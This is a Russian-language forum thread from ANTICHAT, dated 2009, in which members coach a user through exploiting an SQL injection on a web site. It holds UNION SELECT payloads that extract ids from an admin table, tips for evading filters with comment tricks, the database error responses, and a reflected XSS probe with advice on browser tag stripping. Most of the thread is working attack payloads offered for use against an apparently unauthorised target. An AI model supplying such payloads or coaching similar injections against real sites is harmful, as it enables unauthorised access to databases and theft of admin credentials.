ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.11.2009, 18:58
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от B1t.exe
получется иммем MySQL версии 4.1.22 ?
Ну получается что так 
|
|
|
20.11.2009, 19:31
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
2B1t.exe
Код:
id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,id)+from+admin+limit+0,1+--+
|
|
|
|
20.11.2009, 22:39
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
z00MAN
че-то не каннает ! 
делаю такой запрос:
Код:
http://www.site.ru/index.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,id)+from+admin+limit+0,1+--+
но получаю такое:
Код:
error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 2
|
|
|
|
20.11.2009, 22:50
|
|
Познающий
Регистрация: 27.03.2009
Сообщений: 40
Провел на форуме:
1191962
Репутация:
39
|
|
2B1t.exe
попробуй вместо + использовать /**/ или в конеце вместо -- ставить например /* или вместо -1 поставь 9999999999 или 1' пробуй разные вариаты...
|
|
|
|
20.11.2009, 22:56
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
Сообщение от B1t.exe
z00MAN
че-то не каннает !
делаю такой запрос:
Код:
http://www.site.ru/index.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,id)+from+admin+limit+0,1+--+
но получаю такое:
Код:
error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 2
Ну и че те не канает?
Выдалож id==1
|
|
|
|
20.11.2009, 23:48
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
Adm1n4eG
пробовал все варинаты и все выдали один и тот же сообшение, что и написал в предыдышем посте !
вот только при запросе:
http://www.site.ru/index.php?id= 1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat(0x27,id)+from+admin+limit+0,1+--+
получил уже такое
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' union select 1,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat(0x27,id) from admin li' at line 2
жель не знаю как юзать дальше...
-------
Кстати, если ввести такое:
http://www.site.ru/index.php?id=subHeader=<script>alert(Hello)</ script>, то получаеться такая картина
И как я понял - это говорит о потенциальном XSS опасности.
Последний раз редактировалось B1t.exe; 20.11.2009 в 23:57..
|
|
|
|
21.11.2009, 00:01
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Сообщение от B1t.exe
Adm1n4eG
пробовал все варинаты и все выдали один и тот же сообшение, что и написал в предыдышем посте !
вот только при запросе:
http://www.site.ru/index.php?id= 1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat(0x27,id)+from+admin+limit+0,1+--+
получил уже такое
жель не знаю как юзать дальше...
-------
Кстати, если ввести такое:
http://www.site.ru/index.php?id=subHeader=<script>alert(Hello)</ script>, то получаеться такая картина
И как я понял - это говорит о потенциальном XSS опасности.
Tсли есть вывод из sql-inj данных на страницу(ну блин, любую строку можно внедрить в html а броузер потом её обработает), то всегда есть опасность xss. в твоем случае я вижу обрезание тега <script>
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
21.11.2009, 00:03
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
У него ИЕ обрезает теги
|
|
|
|
21.11.2009, 00:35
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
получаеться все? не получиться раскрутить это?
|
|
|
|
21.11.2009, 00:46
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Сообщение от B1t.exe
получаеться все? не получиться раскрутить это?
Если IE обрезает, xss может действовать в других браузерах.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
